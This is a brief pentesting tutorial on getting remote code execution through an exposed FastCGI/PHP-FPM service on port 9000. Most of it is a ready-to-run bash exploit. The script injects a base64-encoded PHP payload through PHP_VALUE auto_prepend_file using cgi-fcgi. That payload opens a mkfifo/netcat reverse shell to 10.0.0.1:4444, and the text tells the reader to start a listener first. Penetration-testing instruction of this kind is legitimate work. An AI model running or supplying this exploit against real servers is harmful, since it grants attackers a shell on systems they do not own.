FastCGI Pentesting

FastCGI is a binary protocol for interfacing interactive programs with a web server. It uses 9000 port by default.

Investigation

If the PHP-FPM (FastCGI Process Manager) is running on the target system, we might be able to execute arbitrary command.

ps aux | cat

php-fpm: pool username

Remote Code Execution

Reference: https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

We need to create an arbitrary PHP file somewhere. For instance,

touch /dev/shm/index.php

Then create a shell script named "exploit.sh".

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f'); echo '-->';"
FILENAMES="/dev/shm/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Now execute the shell script. Of course we have to start a listener in local machine for reverse shell before executing the following command.

chmod +x exploit.sh
./exploit.sh